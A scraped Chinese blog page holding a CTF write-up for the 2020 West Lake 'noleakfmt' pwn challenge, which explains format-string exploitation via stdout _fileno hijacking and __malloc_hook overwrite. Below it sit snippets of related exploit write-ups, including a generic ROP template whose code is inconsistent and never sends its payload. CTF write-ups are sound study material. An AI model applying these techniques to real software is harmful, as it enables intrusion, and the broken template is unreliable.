2020 西湖论剑 pwn noleakfmt

最新推荐文章于 2025-02-18 20:27:53 发布
原创 最新推荐文章于 2025-02-18 20:27:53 发布 · 830 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

在这里插入图片描述
canary没开,方便溢出。

主逻辑简单。
在这里插入图片描述
格式化字符串漏洞。
给了我们一个栈地址,但是主要问题是把标准输出关掉了。
我们要利用的呢就是将_IO_2_1_stdout_的_fileno从1改成2,为啥呢?
对于一个FILE结构体来说,最重要的就是_flags和_fileno,_fileno存储的是我们的文件描述符,对于某些情况或许我们要劫持_fileno才能达到我们的目的,而_flags则标志了该FILE的一些行为,这对于我们的泄露至关重要。

我们想办法劫持结构体的_fileno之后就可以从标准错误做一个输出。

那我们利用的一个思路如下。

第一步的思路是调用printf函数时会把_IO_2_1_stdout_的地址入栈。通过修改printf的函数返回地址为start可以使栈向低地址生长,这样就可以利用栈中的_IO_2_1_stdout_的地址
首先利用main函数返回值下面的一条栈指针链来修改printf的返回地址。
在这里插入图片描述
在这里插入图片描述
然后利用这个链条来把printf的返回值修改成start函数。
在这里插入图片描述
这里会因为地址问题我们需要爆破一下,调试的时候可以直接用set指令来改过来。

在这里插入图片描述

开始执行start函数。

然后就会有IO_FILE的指针。
在这里插入图片描述

在最下面又有一个链,我们来用它攻击_IO_2_1_stdout_
在这里插入图片描述

然后是第二步:修改_IO_2_1_stdout_的fileno的值为0x2
在这里插入图片描述

在这里插入图片描述

第三步泄漏libc地址
在这里插入图片描述

第四步修改栈中的数据为__malloc_hook的地址
向__malloc_hook中写入one_gadget
利用printf打印大量字符调用malloc

这就像非栈上的格式化字符串漏洞一样,利用栈链,将one_gadget写到malloc_hook就可以了。

第五步因为标准输出关了,所以就cat flag 1>&2

在这里插入图片描述

exp

#!/usr/bin/python3
#-*- coding:utf8 -*-
from pwn import *

context.log_level = 'debug'
libc = ELF('./libc.so.6')

def pwn(param1, param2, param3, p):
    payload = '%{}c%{}${}'.format(param1, param2, param3
最低0.47元/天 解锁文章
西湖论剑——pwn
weixin_44319142的博客
04-07 653
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
2021 西湖论剑 pwn blind
yongbaoii的博客
03-26 689
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0) exp #/usr/env/bin python from pwn import * import time context.log_level = "debug" gadget1 = 0x4007ba gadget2 = 0x4007a0 elf = ELF('./blind') read_got = el.
西湖论剑2020 pwn mmutag wp
weixin_45677731的博客
10-11 567
拿到题目,给了libc库,太可了,爱了爱了 开局malloc(0x68)输入姓名,这个0x68给人一种熟悉的感觉 程序会顺便输出保存着chunk指针的栈地址,暂时没发现有什么吊用 heap的部分,只有malloc和free的功能 并且固定申请0x68的chunk free这里,出现了经典的free之后未置0 而且还刚好是0x68的chunk 常见做法就是double free后劫持malloc_hook 然后就是泄露libc基地址 始终没找到什么好办法,泄露出来的栈地址看似也无法得到libc_base
[Pwn] Writeup - 2025西湖论剑 - Pwn
Lufiende的博客
02-10 182
西湖论剑2025 Pwn 方向 WriteUp
pwn-2019西湖论剑之story
CharlesGodX的博客
04-09 844
0x00:前言 这道题是64位程序,涉及到canary绕过,格式化字符串漏洞,是一道非常好的练习题 0x01:题目思路 首先检查保护,可以看到有堆栈不可执行和canary保护 Thunder_J@Thunder_J-virtual-machine:~/桌面$ checksec story [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/story' ...
2024西湖论剑WP(reverse_MZ)
ZJPC007的博客
02-05 887
有函数可知,根据转换得到48位的字符串并进行SHA1加密,密文为dc0562f86bec0a38508e704aa9faa347101e1fdb。因为转换过程中有多种可能,所以需要进行一些手搓的步骤,逐渐得到flag。思路大概就是先进行转换然后SHA1加密。逆向板块就做出这一题。
西湖论剑WriteUp By Nu1L.pdf
11-26
"西湖论剑WriteUp By Nu1L" 本文档涵盖了多个IT领域的知识点,涵盖了信息安全、密码学、编程语言和算法等领域。下面将逐一介绍这些知识点。 1. Reverse ROR(Reverse Rotate Right):从代码中可以看到,作者使用...
西湖论剑2025 pwn
yufeiyu66的博客
02-18 372
这里存在一个洞,vector+24是存放result的地方,连续push 7次就会把vector+24地方的改掉成我们输入的数字了。没有read 但是可以直接用mmap映射到空间上 ,write函数用\x90占位,然后正常syscall。这样就可以找到libc,后面就是利用edit劫持这个函数,改成system /bin/sh。题目映射了一段可以可读可写可执行的空间,并且调用执行这段空间。有两个防御,一个检查syscall只能调用两次,一个沙箱。因此,有可以直接用shellcraft生成一个提权的脚本。
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 1068
西湖论剑2022pwn
[BUUCTF-pwn] 西湖论剑_2018_小陈的笔记本加强版
weixin_52640415的博客
01-04 366
难度到是没啥难度,需要设计一下块的布置。 菜单题,有add,free,居然还有edit和show(这个很少见了),管理块0x90,在0x70放size和ptr,这样控制ptr就基本OK了。 漏洞点: readnb函数有off_by_null unsigned __int64 __fastcall sub_400B8B(__int64 a1, int a2) { char buf; // [rsp+1Fh] [rbp-11h] BYREF int i; // [rsp+20h] [rbp-1
2020 西湖论剑 pwn mmutag
yongbaoii的博客
01-19 216
libc给的是2.23 pie没开 RELRO没开全。 栈地址堆地址都给了。 两个功能 1 2 主功能的free函数有uaf。 直接利用就好。 exp from pwn import * context(os='linux', arch='amd64', log_level='debug') r = process("./mmutag") elf = ELF("./mmutag") libc = ELF("./libc.so.6") def menu(idx): r.recv()
2023西湖论剑pwn 部分wp
cainiao78777的博客
02-18 847
也就是*(&v3 + i) = v0 修改一个字节的内容,但是我们也要解一下这个方程,以免程序被exit()而且在buf的下面的变量都是能够覆盖的,也就是说,我们能通过覆盖 i 的值进行数组溢出。一个格式化字符串漏洞,一个栈溢出,但是只能副盖rbp和返回地址,所有要考虑栈迁移。我看有个大佬的解法很奇特,准备学习一下,待我学成,再来补充另外一种方法。泄露出这个函数地址,就能得到 libc——base。根据距离rbp的距离将相应的变量填入。这里的main指的是start,第二次getshell。
西湖论剑逆向
qq_41071646的博客
04-09 618
其实可以石锤我是标题党了 哈哈哈 其实这个我也很尴尬 ·~ 没有题目 没办法好好的去做一下题 但是听说安恒会有复现 复现的时候能够好好做也是极好的 然后 先说一下这个题 题目 其实是在https://www.52pojie.cn/thread-924174-1-1.html这个链接下载的 多谢师傅的分享 其实 testre 这个题 很简单的一个题 就是 怎...
[BUUCTF]PWN——wustctf2020_closed
mcmuyanga的博客
01-12 3923
wustctf2020_closed 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,首先是检索程序里的字符串,找到了后门 main函数里的关键函数 close1)关闭了标准输出 close(2)关闭了标准错误 我们只剩下标准输入,并且看到程序会返回shell(0是标准输入,1是标准输出,2是标准错误) 在看了别人的wp之后了解到,原来可以对stdout重定向,将文件描述符 1 重定向到文件描述符 0 : 因此这题不用写exp,直接执行 ex
buuctf-pwn write-ups (7)
CoLin的pwn小屋
07-01 583
buuctf-pwn 054~061题题解
fclose(stdout)close(1)的区别
热门推荐
金九 的技术博客
02-03 1万+
在论坛里有人问【发现close(1)和fclose(stdout)效果并不一样,为什么?】 ,勾起了我的好奇心,于是研究了一把,记录一下。 #include #include #include #include #include #include #include int main(int argc, char *argv[]) { int fd = open("/dev
2019 D^3CTF unprintableV详细题解
seaaseesa的博客
11-30 1741
unprintableV 这是2019 d3ctf的一道pwn题,由于当时知识储备不够没做出来,赛后就好好研究,从中学到了新的知识 本题用到的知识有:ROP、stdout指针与stderr指针、栈迁移、格式化字符串漏洞 首先,我们检查一下程序的保护机制 除了canary,其它的保护都开了 然后,我们用IDA分析一下 这个沙箱函数,把execve函数给禁用了,所以,我们不能getsh...
2021-NCTF pwn方向题目复现
Amalllの博客
12-01 3686
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1、easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
水几个pwn
Stella_Leo的博客
08-24 347
author: moqizou 2020-羊城杯-signin 签到题目2.23的glibc add - 最多10个chunk然后会malloc(0x28)之后就是namesize结构体如下 0x10 chunk 头 0x8 1 inuse位置 0x8 buf->name_chunk 0x8 23字节的message 0x8 看上面可以溢出 然后会把该chunk指针 存入全局table view 通过判断inuse输出name和message del uaf,只清除chunk_table和name.
2025 西湖论剑 WP Pwn
最新发布
03-13
### 2025年西湖论剑WP Pwn比赛详情及相关信息 #### 比赛背景 2025年的第八届西湖论剑网络安全技能大赛中的Pwn部分,作为一项高水平的技术竞赛吸引了众多安全研究者和技术爱好者参与[^1]。该赛事主要考察选手在二进制漏洞挖掘与利用方面的技术能力。 #### 参赛队伍概况 虽然具体参赛队伍名单未完全公开,但从往届情况来看,通常由国内外知名高校的安全团队、企业内部红队以及独立白帽黑客组成。这些队伍通过预选赛晋级决赛阶段,在比赛中展示其卓越的技术实力和快速解决问题的能力[^4]。 #### 解题思路概述 以下是基于已有资料总结的一些典型Pwn题目及其解决方法: 1. **Canary泄露与栈溢出** - 题目可能设置了栈保护机制(Stack Canary),攻击者需先通过某种方式泄露Canary值。 - 利用缓冲区溢出覆盖返回地址,并结合ROP链调用`system("/bin/sh")`完成提权操作。 2. **堆风水与UAF (Use After Free)** - 堆管理错误是常见的一类漏洞形式之一。例如程序可能存在释放后重用指针或者大小计算不当等问题。 - 攻击策略包括调整内存布局使得特定数据结构被可控内容填充;进而伪造chunk header实现任意读写功能[^3]。 3. **格式化字符串漏洞** - 当输入参数未经严格校验便传递给printf系列函数时,则可能发生此类问题。 - 使用这种方法可以探知目标进程内部状态(如基址偏移量),为进一步构建payload奠定基础[^2]。 4. **Return-Oriented Programming (ROP) 技巧应用** - 对于开启了NX(non-executable stack)防护措施的目标环境来说,单纯注入shellcode难以奏效。 - 此刻就需要寻找gadgets组合起来执行所需命令序列。 ```python from pwn import * context.arch = 'amd64' elf = ELF('./vuln') libc = elf.libc # Establish connection to service or binary locally/remote. if args.REMOTE: io = remote('challenge.example.com', 1337) else: io = process([elf.path]) # Leak canary value via format string bug. io.recvuntil(b'What is your name? ') fmt_str_payload = b'%15$p.%19$p.' io.sendline(fmt_str_payload) leaked_data = io.recvline().strip() stack_canary, libc_base_leak = map(lambda x:int(x,16), leaked_data.split(b'.')) log.info(f'Stack Canary Value:{hex(stack_canary)}') # Calculate actual addresses based on leaks. base_addr_offset = u64(libc_base_leak.ljust(8,b'\x00')) - libc.symbols['puts'] system_plt = base_addr_offset + libc.symbols['system'] pop_rdi_ret_gadget = next(elf.search(asm('pop rdi; ret'))) bin_sh_string_loc = next(elf.search(b'/bin/sh\x00')) exploit_chain = flat([ pop_rdi_ret_gadget, bin_sh_string_loc, system_plt ]) offset_to_overwrite_return_address = cyclic_find(0x61616161) # Replace with correct offset found during fuzzing phase. final_exploit_buffer = fit({ offset_to_overwrite_return_address : exploit_chain },filler=b'A'*offset_to_overwrite_return_address) io.interactive() if args.DEBUG else None ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值